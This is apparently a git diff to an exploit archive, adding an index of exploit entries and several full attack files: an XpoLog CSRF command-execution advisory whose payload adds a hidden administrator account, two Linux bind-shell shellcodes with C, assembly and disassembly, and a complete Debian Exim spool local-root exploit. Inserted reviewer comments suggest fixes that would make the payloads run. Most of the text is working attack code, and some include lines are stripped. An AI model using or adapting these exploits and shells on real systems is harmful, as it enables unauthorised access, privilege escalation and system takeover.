diff --git a/files.csv b/files.csv
index 38b69cee7..7c4090a46 100755
--- a/files.csv
+++ b/files.csv
@@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
-38076,platforms/php/webapps/38076.txt,"BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
+38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting Vulnerability",2012-12-01,eidelweiss,php,webapps,0
@@ -35763,7 +35763,7 @@ id,file,description,date,author,platform,type,port
39541,platforms/linux/dos/39541.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39543,platforms/linux/dos/39543.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39544,platforms/linux/dos/39544.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
-39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
+39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro <= 10.5.7.32 & Nitro Reader <= 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80
39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent XSS",2016-03-10,"Mohammad Khaleghi",php,webapps,80
@@ -36161,6 +36161,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
+40054,platforms/linux/local/40054.c,"Debian Exim - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@@ -36220,4 +36221,11 @@ id,file,description,date,author,platform,type,port
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
-40049,platforms/linux/local/40049.c,"Ubuntu 16.04 local root exploit - netfilter target_offset OOB",2016-07-03,vnik,linux,local,0
+40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
+40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303
+40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
+40052,platforms/lin_x86-64/shellcode/40052.c,"Linux 64bit NetCat Bind Shell Shellcode - 64 bytes",2016-07-04,CripSlick,lin_x86-64,shellcode,0
+40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80
+40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
+40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
+40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
diff --git a/platforms/jsp/webapps/40050.txt b/platforms/jsp/webapps/40050.txt
new file mode 100755
index 000000000..35cc14261
--- /dev/null
+++ b/platforms/jsp/webapps/40050.txt
@@ -0,0 +1,98 @@
+
+XpoLog Center V6 CSRF Remote Command Execution
+
+
+Vendor: XpoLog LTD
+Product web page: http://www.xpolog.com
+Affected version: 6.4469
+ 6.4254
+ 6.4252
+ 6.4250
+ 6.4237
+ 6.4235
+ 5.4018
+
+Summary: Applications Log Analysis and Management Platform.
+
+Desc: XpoLog suffers from arbitrary command execution. Attackers
+can exploit this issue using the task tool feature and adding a
+command with respected arguments to given binary for execution.
+In combination with the CSRF an attacker can execute system commands
+with SYSTEM privileges.
+
+Tested on: Apache-Coyote/1.1
+ Microsoft Windows Server 2012
+ Microsoft Windows 7 Professional SP1 EN 64bit
+ Java/1.7.0_45
+ Java/1.8.0.91
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5335
+Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
+
+
+14.06.2016
+
+--
+
+
+exePath = "C:\\windows\\system32\\cmd.exe"
+exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
+
+
+
+
+
+
+
+--
+
+exePath = "C:\\windows\\system32\\cmd.exe"
+exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
+
+
+GET
+http://10.0.0.17:30303/logeye/testingus.txt
+
+Response:
+
+nt authority\system
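Review bot: The proof-of-concept is not reproducible as published — lines 92-93 and 103-104 give only the task tool's `exePath`/`exeArgs` values, and nothing shows the request they are submitted in (endpoint under `/logeye/`, HTTP method, form field names), so the cross-site part of "CSRF Remote Command Execution" cannot be verified or turned into a detection rule; the HTML form that would normally carry those two values appears to have been stripped from this copy. The `nt authority\system` output on line 112 supports the SYSTEM claim only for the Windows service installs listed under "Tested on"; I would qualify line 70 as `commands run with the privileges of the XpoLog service account (SYSTEM on the tested Windows hosts)`. If the root cause is that the task-creation request carries no anti-CSRF token and relies only on the session cookie, the advisory should say so explicitly, and state whether any build later than 6.4469 addresses it.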
diff --git a/platforms/lin_x86-64/shellcode/40052.c b/platforms/lin_x86-64/shellcode/40052.c
new file mode 100755
index 000000000..aeed81992
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40052.c
@@ -0,0 +1,40 @@
+#include
+#include
+
+// Exploit Title: [NetCat Bind Shell 64bit 64byte]
+// Date: [6/28/2016]
+// Exploit Author: [CripSlick]
+// Tested on: [Kali 2.0]
+// Version: [v1.10-41]
+
+// ShepherdDowling@gmail.com
+// OffSec ID: OS-20614
+
+// Victim: netstat -an | grep LISTEN | grep tcp
+// Attacker: nc
+
+unsigned char code[] = \
+
+#define PORT "\x39\x39"
+// Keep to two bytes
+
+"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+;
+
+int main ()
+{
+ // I make sure there are no nulls
+ // The string count will terminate at the first \x00
+ printf("The Shellcode is %d Bytes Long\n", strlen(code));
+
+ // Next I throw 0xAAAAAAAA into every register before shellcode execution
+ // This ensures that the shellcode will run in any circumstance
+
+ __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
+ "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
+ "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
+ "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
+ "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
+ "call code");
+ return 0;
+}
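Review bot: `call code` on line 156 jumps into `code[]`, a writable data object, and the listing gives no build flags; with a default modern gcc/ld that section is non-executable and the harness will fault before the payload runs, so the header should carry `// Build: gcc -z execstack -fno-stack-protector 40052.c` (the sibling 40056.c does this on its line 411). The `#define PORT "\x39\x39"` comment "Keep to two bytes" understates the constraint: the bytes are consumed as the ASCII argument of `-p` (line 139 pushes `-p` followed by PORT, i.e. `-p99`), so only two-digit decimal ports can be expressed and a binary port value would not work; I would write `// PORT is two ASCII digits appended to nc's -p option (here "99"); not a network-order uint16`. The payload executes `//bin/nc -p99 -lve //bin/sh`, which needs a netcat built with `-e` support (nc.traditional on the tested Kali 2.0); the OpenBSD nc shipped by many distributions rejects `-e` and the bind shell silently fails. The two `#include` lines at 119-120 have lost their operands (presumably `<stdio.h>` and `<string.h>`), so the file does not compile as shown.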
diff --git a/platforms/lin_x86/shellcode/40056.c b/platforms/lin_x86/shellcode/40056.c
new file mode 100755
index 000000000..57922794d
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40056.c
@@ -0,0 +1,265 @@
+/*
+# Linux x86 TCP Bind Shell Port 4444 (98 bytes)
+# Author: sajith
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 98
+# SLAE - 750
+
+------------c prog ---poc by sajith shetty----------
+#include
+#include
+#include
+#include
+#include
+
+int main(void)
+{
+
+int sock_file_des, clientfd;
+struct sockaddr_in sock_ad;
+//[1]we need to create the socket connection using socket call function
+
+//[*]Man page for socket call
+//----->int socket(int domain, int type, int protocol);
+// domain = AF_INET (IPv4 Internet protocol family which will be used for communication)
+// type = SOCK_STREAM (Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmission mechanism may be supported
+// protocol = 0 (The protocol specifies a particular protocol to be used with the socket.Normally only a single protocol exists to support a particular socket type within a given protocol family, in which case protocol can be specified as 0.
+
+sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
+//[2]Binds the socket to localhost and port (here will use 4444) using bind call.
+
+//[*]Man page for bind call
+//------->int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
+// sockfd = sock_file_des
+// const struct sockaddr *addr = (struct sockaddr *)&sock_ad (bind() assigns the address specified to by addr to the socket referred to by the file descriptor sockfd)
+// socklen_t addrlen = sizeof(sock_ad) (addrlen specifies the size, in bytes, of the address structure pointed to by addr.)
+
+sock_ad.sin_family = AF_INET; // Host byte order.(2)
+sock_ad.sin_port = htons(4444);// network byte order
+sock_ad.sin_addr.s_addr = INADDR_ANY;//(0)bindshell will listen on any address
+
+bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad));
+
+
+//[3]Waits for incoming connection using call to listen
+
+//[*]Man page for listen call
+//------->int listen(int sockfd, int backlog);
+// sockfd = sock_file_des (The sockfd argument is a file descriptor that refers to a socket of type SOCK_STREAM)
+// backlog = 0 (The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow)
+
+
+listen(sock_file_des, 0);
+
+//[4]Accept the connection using call to accept
+
+//[*]Man page to accept call
+//------->int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+// sockfd = sock_file_des
+// struct sockaddr *addr = NULL (The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer.When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.
+// socklen_t *addrlen = NULL
+
+
+clientfd = accept(sock_file_des, NULL, NULL);
+
+//[5]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
+
+//[*]Man page for dup2 (duplicate a file descriptor)
+//------->int dup2(int oldfd, int newfd);
+// oldfd = clientfd
+// newfd = 0(stdin) , 1(stdout), 2(stderr)
+dup2(clientfd, 0); // stdin
+dup2(clientfd, 1); // stdout
+dup2(clientfd, 2); // stderr
+
+//[6]Execute shell (here we use /bin/sh) using execve call
+
+//[*]Man page for execve call
+//------->int execve(const char *filename, char *const argv[],char *const envp[]);
+// char *filename = /bin/sh
+// char *const argv[] = NULL
+// char *const envp[] = NULL
+
+execve("/bin/sh",NULL,NULL);
+}
+----------------------end of c program--------------
+
+global _start
+
+section .text
+
+_start:
+
+;syscall for socket
+;cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket
+;#define __NR_socketcall 102 (0x66 in hex)
+;sock_file_des = socket(AF_INET, SOCK_STREAM, 0)
+;AF_INET = 2 ( bits/socket.h)
+;SOCK_STREAM = 1 (bits/socket.h)
+;socket(2,1,0)
+xor eax, eax ; zero out eax register using XOR operation
+xor ebx, ebx ; zero out ebx register using XOR operation
+push eax ; move 0 to stack (protocol=0)
+mov al, 0x66 ; moves socket call number to al register
+mov bl, 0x1 ; moves 0x1 to bl register
+push ebx ; value in ebx=1 is pushed in to the stack (sock_stream =1)
+push 0x2 ; value 0x2 is pushed onto stack (AF_INET=2)
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80 ; socket()
+mov esi, eax ; store sockfd in esi register
+
+;sock_ad.sin_addr.s_addr = INADDR_ANY;//0, bindshell will listen on any address
+;sock_ad.sin_port = htons(4444);// port to bind.(4444)
+;sock_ad.sin_family = AF_INET; // TCP protocol (2).
+xor edx, edx ; zero out edx register using XOR operation
+push edx ; push 0 on to stack (INADDR_ANY)
+push word 0x5C11; htons(4444)
+push word 0x2 ; AF_INET = 2
+mov ecx, esp ; save the pointer to args in ecx
+
+;bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad));
+;cat /usr/include/linux/net.h | grep bind
+;bind = 2
+
+mov al, 0x66 ; sys socket call
+mov bl, 0x2 ; bind =2
+push 0x10 ; size of sock_ad (sizeof(sock_ad))
+push ecx ; struct pointer
+push esi ; push sockfd (sock_file_des) onto stack
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80
+
+
+;listen(sock_file_des, 0);
+;cat /usr/include/linux/net.h | grep listen
+; listen =4
+
+mov al, 0x66 ; sys socket call
+mov bl, 0x4 ; listen=4
+push edx ; push 0 onto stack (backlog=0)
+push esi ; sockfd (sock_file_des )
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80
+
+;clientfd = accept(sock_file_des, NULL, NULL)
+;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+;cat /usr/include/linux/net.h | grep accept
+; accept=5
+
+mov al, 0x66 ; sys socket call
+mov bl, 0x5 ; accept =5
+push edx ; null value socklen_t *addrlen
+push edx ; null value sockaddr *addr
+push esi ; sockfd (sock_file_des )
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80
+
+;int dup2(int oldfd, int newfd);
+;dup2(clientfd, 0); // stdin
+;dup2(clientfd, 1); // stdout
+;dup2(clientfd, 2); // stderr
+
+mov ebx, eax ;move client fd to ebx
+xor ecx, ecx ; xor to clear out ecx
+mov cl, 3 ; counter to loop 3 times
+
+loopinghere:
+
+mov al, 0x3f ; sys call for dup2
+int 0x80
+dec cl ; decrement till 0
+jns loopinghere ; loop as long sign flag is not set
+
+;Execute shell (here we use /bin/sh) using execve call
+;execve("//bin/sh",["//bin/sh"])
+
+mov al, 11 ; execve
+ push edx ; push null
+ push 0x68732f6e ; hs/b
+ push 0x69622f2f ; ib//
+ mov ebx,esp ; save pointer
+ push edx ; push null
+ push ebx ; push pointer
+ mov ecx,esp ; save pointer
+ int 0x80
+-------------obj dump------------
+finalcode: file format elf32-i386
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 31 c0 xor eax,eax
+ 8048062: 31 db xor ebx,ebx
+ 8048064: 50 push eax
+ 8048065: b0 66 mov al,0x66
+ 8048067: b3 01 mov bl,0x1
+ 8048069: 53 push ebx
+ 804806a: 6a 02 push 0x2
+ 804806c: 89 e1 mov ecx,esp
+ 804806e: cd 80 int 0x80
+ 8048070: 89 c6 mov esi,eax
+ 8048072: 31 d2 xor edx,edx
+ 8048074: 52 push edx
+ 8048075: 66 68 11 5c pushw 0x5c11
+ 8048079: 66 6a 02 pushw 0x2
+ 804807c: 89 e1 mov ecx,esp
+ 804807e: b0 66 mov al,0x66
+ 8048080: b3 02 mov bl,0x2
+ 8048082: 6a 10 push 0x10
+ 8048084: 51 push ecx
+ 8048085: 56 push esi
+ 8048086: 89 e1 mov ecx,esp
+ 8048088: cd 80 int 0x80
+ 804808a: b0 66 mov al,0x66
+ 804808c: b3 04 mov bl,0x4
+ 804808e: 52 push edx
+ 804808f: 56 push esi
+ 8048090: 89 e1 mov ecx,esp
+ 8048092: cd 80 int 0x80
+ 8048094: b0 66 mov al,0x66
+ 8048096: b3 05 mov bl,0x5
+ 8048098: 52 push edx
+ 8048099: 52 push edx
+ 804809a: 56 push esi
+ 804809b: 89 e1 mov ecx,esp
+ 804809d: cd 80 int 0x80
+ 804809f: 89 c3 mov ebx,eax
+ 80480a1: 31 c9 xor ecx,ecx
+ 80480a3: b1 03 mov cl,0x3
+
+080480a5 :
+ 80480a5: b0 3f mov al,0x3f
+ 80480a7: cd 80 int 0x80
+ 80480a9: fe c9 dec cl
+ 80480ab: 79 f8 jns 80480a5
+ 80480ad: b0 0b mov al,0xb
+ 80480af: 52 push edx
+ 80480b0: 68 6e 2f 73 68 push 0x68732f6e
+ 80480b5: 68 2f 2f 62 69 push 0x69622f2f
+ 80480ba: 89 e3 mov ebx,esp
+ 80480bc: 52 push edx
+ 80480bd: 53 push ebx
+ 80480be: 89 e1 mov ecx,esp
+ 80480c0: cd 80 int 0x80
+
+-----------------------------------------------
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+
+"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68"
+"\x11\x5c" // port number 4444
+"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}
\ No newline at end of file
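Review bot: The dup2 loop at lines 326-335 runs four times, not the "3 times" stated on line 328: `cl` starts at 3 and `jns` only exits once `dec cl` wraps to 0xff, so the calls are `dup2(clientfd, 3)`, then 2, 1, 0. The first of those overwrites fd 3, which in the common case (fds 0-2 open, nothing else) is the listening socket returned by `socket()` on line 272, so the listener is closed as a side effect; that is survivable but undocumented. Starting the counter at 2 — `mov cl, 2 ; dup2 onto 2,1,0 (loop exits when cl wraps negative)` and `\xb1\x02` in the string on line 421 — gives exactly the three documented duplications at the same 98-byte length. The `#include` lines at 173-177 and 414-415 have lost their operands, and `main()` on line 424 relies on implicit int, which current gcc rejects by default; both mean the harness does not build as listed.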
diff --git a/platforms/linux/local/40054.c b/platforms/linux/local/40054.c
new file mode 100755
index 000000000..ec9b5622a
--- /dev/null
+++ b/platforms/linux/local/40054.c
@@ -0,0 +1,280 @@
+/*
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Hello List,
+
+This is just a minor issue in Exim, no replies so far, so publication
+should be OK.
+
+Introduction:
+============
+Exim4 in some variants is started as root but switches to uid/gid
+Debian-exim/Debian-exim. But as Exim might need to store received
+messages in user mailboxes, it has to have the ability to regain
+privileges. This is also true when Exim is started as "sendmail".
+During internal operation, sendmail (Exim) will manipulate message
+spool files in directory structures owned by user "Debian-exim"
+without caring about symlink attacks. Thus execution of code as
+user "Debian-exim" can be used to gain root privileges by invoking
+"sendmail" as user "Debian-exim".
+
+
+POC:
+===
+http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
+demonstrates the issue using a ELF file being both executable
+and shared library which is invoked multiple times by different
+processes.
+
+
+Results, Discussion:
+===================
+As Exim4 process itself is already quite privileged - it has to
+access the user mailboxes with different UIDs anyway - the having
+such problems is expectable and explainable. A change in documentation
+might make sense, to indicate, that the special user "Debian-exim"
+is only intended to mark files being used by the daemon, but not
+to provide root/daemon user privilege separation.
+
+Even without this vulnerability, a "Debian-exim" process could
+use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
+to escalate to "adm" group, which again makes it very likely to
+use "syslog", "apache" or other components to escalate to root
+via "/var/log". This is annoying, perhaps this should get a CVE
+to make daemon-to-root escalations harder in general.
+
+
+Timeline:
+========
+20160605: Discovery, report Debian security
+20160607: Writeup
+20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
+20160630: Publication
+
+
+References:
+==========
+* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
+* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
+* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
+-----BEGIN PGP SIGNATURE-----
+
+iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj
+8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H
+=4IJk
+-----END PGP SIGNATURE-----
+
+ * This software is provided by the copyright owner "as is" and any
+ * expressed or implied warranties, including, but not limited to,
+ * the implied warranties of merchantability and fitness for a particular
+ * purpose are disclaimed. In no event shall the copyright owner be
+ * liable for any direct, indirect, incidential, special, exemplary or
+ * consequential damages, including, but not limited to, procurement
+ * of substitute goods or services, loss of use, data or profits or
+ * business interruption, however caused and on any theory of liability,
+ * whether in contract, strict liability, or tort, including negligence
+ * or otherwise, arising in any way out of the use of this software,
+ * even if advised of the possibility of such damage.
+ *
+ * Copyright (c) 2016 halfdog
+ * See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
+ * for more information.
+ *
+ * Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
+ * Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade"
+#define UPGRADE_LIB_DIR "/var/spool/exim4"
+
+#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1"
+
+extern char **environ;
+
+#if defined(__x86_64__)
+const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
+#define init_args(argc, argv) __asm__ volatile ( \
+ "mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
+ :"=m"(argc), "=r"(argv)::"memory")
+#endif /* __x86_64__ */
+
+
+/** Library initialization function, called by the linker. If not
+ * named _init, parameter has to be set during linking using -init=name
+ */
+extern void _libInit() {
+ if(geteuid()!=0) return;
+ int result=chown(UPGRADE_FILE_NAME, 0, 0);
+ assert(!result);
+ result=chmod(UPGRADE_FILE_NAME, 04755);
+ assert(!result);
+ exit(0);
+}
+
+extern void _entry (void) {
+ int argc=0;
+ char **argv = NULL;
+ init_args(argc, argv);
+ int result=main(argc, argv);
+ exit(result);
+}
+
+extern void pam_start() {}
+extern void pam_set_item() {}
+extern void pam_chauthtok() {}
+extern void pam_end() {}
+extern void pam_strerror() {}
+extern void pam_getenvlist() {}
+extern void pam_open_session() {}
+extern void pam_close_session() {}
+extern void pam_get_item() {}
+extern void pam_acct_mgmt() {}
+extern void pam_setcred() {}
+extern void pam_authenticate() {}
+
+
+int main(int argc, char **argv) {
+ DIR *dirStruct;
+ struct dirent *dirEnt;
+ char linkPath[1024];
+ int result;
+
+ assert(argc>1);
+ if(!strcmp(argv[1], "--Exec")) {
+ setresgid(0, 0, 0);
+ setresuid(0, 0, 0);
+ execve(argv[2], argv+2, environ);
+ fprintf(stderr, "Exec failed\n");
+ return(1);
+ }
+
+ if(!strcmp(argv[1], "--Repair")) {
+ int targetFd=open(TARGET_PATH, O_RDWR);
+ assert(targetFd>=0);
+ result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
+ assert(!result);
+ chmod(TARGET_PATH, atoi(argv[4]));
+ return(0);
+ }
+
+ if(!strcmp(argv[1], "--Upgrade")) {
+ struct stat origStatData;
+ stat(TARGET_PATH, &origStatData);
+
+ char *execArgs[6];
+ int childPid=fork();
+ if(!childPid) {
+ int inputFd=open("/dev/null", O_RDONLY);
+ dup2(inputFd, 0);
+ execArgs[0]="/usr/sbin/sendmail";
+ execArgs[1]="root@localhost";
+ execArgs[2]=NULL;
+ result=execve(execArgs[0], execArgs, environ);
+ assert(!result);
+ return(0);
+ }
+
+ strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
+ dirStruct=opendir("/var/spool/exim4/msglog");
+ assert(dirStruct);
+ result=1;
+ while(result) {
+ while((dirEnt=readdir(dirStruct))) {
+ if(*dirEnt->d_name=='.') continue;
+// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
+ strncpy(linkPath+23, dirEnt->d_name, 16);
+ result=symlink(TARGET_PATH, linkPath);
+ assert(!result);
+ fprintf(stderr, "Relinked %s\n", linkPath);
+ break;
+ }
+ rewinddir(dirStruct);
+ }
+ closedir(dirStruct);
+ while(1) {
+ struct stat currentStatData;
+ stat(TARGET_PATH, ¤tStatData);
+ if(currentStatData.st_uid!=origStatData.st_uid) break;
+ sleep(1);
+ }
+ waitpid(childPid, NULL, 0);
+
+ fprintf(stderr, "Target ready for writing\n");
+ int targetFd=open(TARGET_PATH, O_RDWR);
+ assert(targetFd>=0);
+ char *origData=(char*)malloc(origStatData.st_size);
+ result=read(targetFd, origData, origStatData.st_size);
+ assert(result==origStatData.st_size);
+
+ struct stat newStatData;
+ stat(UPGRADE_FILE_NAME, &newStatData);
+ char *newData=(char*)malloc(newStatData.st_size);
+ int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
+ result=read(selfFd, newData, newStatData.st_size);
+ assert(result==newStatData.st_size);
+ close(selfFd);
+
+ ftruncate(targetFd, 0);
+ lseek(targetFd, 0, SEEK_SET);
+ result=write(targetFd, newData, newStatData.st_size);
+ assert(result==newStatData.st_size);
+ fsync(targetFd);
+
+ childPid=fork();
+ if(!childPid) {
+ execArgs[0]="/bin/su";
+ execArgs[1]=NULL;
+ result=execve(execArgs[0], execArgs, environ);
+ assert(!result);
+ return(0);
+ }
+ waitpid(childPid, NULL, 0);
+
+ ftruncate(targetFd, 0);
+ lseek(targetFd, 0, SEEK_SET);
+ result=write(targetFd, origData, origStatData.st_size);
+ close(targetFd);
+
+ childPid=fork();
+ if(!childPid) {
+ char numbers[128];
+ char *ptr=numbers;
+ execArgs[0]=UPGRADE_FILE_NAME;
+ execArgs[1]="--Repair";
+ result=sprintf(ptr, "%d", origStatData.st_uid);
+ execArgs[2]=ptr; ptr+=result+1;
+ result=sprintf(ptr, "%d", origStatData.st_gid);
+ execArgs[3]=ptr; ptr+=result+1;
+ result=sprintf(ptr, "%d", origStatData.st_mode);
+ execArgs[4]=ptr;
+ execArgs[5]=NULL;
+ result=execve(execArgs[0], execArgs, environ);
+ assert(!result);
+ return(0);
+ }
+ waitpid(childPid, NULL, 0);
+
+ execArgs[0]=UPGRADE_FILE_NAME;
+ execArgs[1]="--Exec";
+ execArgs[2]="/bin/bash";
+ execArgs[3]="-c";
+ execArgs[4]="id; exec $0";
+ execArgs[5]=NULL;
+ execve(execArgs[0], execArgs, environ);
+ return(1);
+ }
+ fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
+ return(1);
+}
